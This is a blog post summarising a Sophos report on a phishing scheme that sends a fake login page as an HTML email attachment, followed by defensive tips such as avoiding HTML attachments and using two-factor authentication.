As if it isn’t tough enough to spot social engineering scams and phishing attacks these days, along comes a devious new threat. A recent post by Sophos Group shares a new phishing scam every business leader and IT pro needs to be aware of.
For context, Sophos explains the three steps scammers typically take when phishing for your digital gold. It’s worth recounting those here: Step 1: Emails with click-through linksImpersonating a trusted (or recognized) sender, the email includes a link. Once clicked, you’re on the edge of trouble, but not over the edge. That takes you to…Step 2: Imposter web pagesAfter you’ve clicked on the email it’s likely there’s a password page in front of you, and often, it looks much like it belongs to the same trusted or recognized source. And, just as often, the imposter pages will be on a legitimate website that’s been hacked. If you don’t stop here you’re opening the door to…Step 3: Password stealersOnce you’ve entered your private data and pressed submit, it’s likely that data isn’t going where you think it is. Hackers frequently “hide” a password-stealing link within the HTML, taking you to what looks like a trusted URL, but is, in fact, a malicious domain.
Step Two With a Twist
Here’s the new wrinkle. While most hackers follow the three steps above, Sophos explains that in step two the hackers didn’t use a link to catch a phish, instead, they used a fake web page that was included with the email as an attachment. Since it isn’t a document that could contain macros or an executable program that can cause an instant disaster, to most people it doesn’t seem dangerous. You might assume that clicking on an attached HTML page will simply open the enclosed web page in the relative safety of your browser, with its (hopefully) strong prevention measures. Here’s where it gets sneaky. Since there isn’t a link in the email, you can’t check it in advance to see if it’s fake. And, because the URL in the address bar is what appears to be a harmless looking local filename, there’s no website name or security certificate you can check. That's when it's easy to take Step 3 and bring the house down.Cyber Safety Phishing Tips
Developers and security specialists will find the Sophos Group’s story is worth reading for a deeper technical dive into these new phishing schemes. For everyone else, here is a list of recommended tactics that will help you fight back against phishing.- Don’t open HTM or HTML attachments unless they are from someone you know, and you are expecting them.
- Don’t log in to web pages that you received in an email. It’s better to reach the page by directly entering the URL in your browser.
- Use two-factor authentication when possible. That gives you one more very strong defense against attacks.
- Change passwords if you think you’ve been attacked. And do it fast so criminals have less time to do their bad deeds.
- Use a solid web antivirus solution. That should stop malware from getting in, and, at the same time, it should check outbound web requests to prevent your data from being stolen.
You May Also Like
- Backup and Disaster Recovery Business Continuity Compliance Cybersecurity Data Protection Data Resilience Ransomware
DCIG Review: Embracing Hybrid Clouds and Mitigating Ransomware Threats with Arcserve UDP 10
October 31st, 2024 - Backup and Disaster Recovery Business Continuity Compliance Cybersecurity Data Resilience
It’s Cybersecurity Awareness Month: Why Compliance Is More Crucial Than Ever To Securing Our World
October 8th, 2024 - Business Continuity Compliance Cybersecurity Data Protection Data Resilience
Tech Conversations | Beyond the Arc: Mastering Crisis Management in Cybersecurity
October 2nd, 2024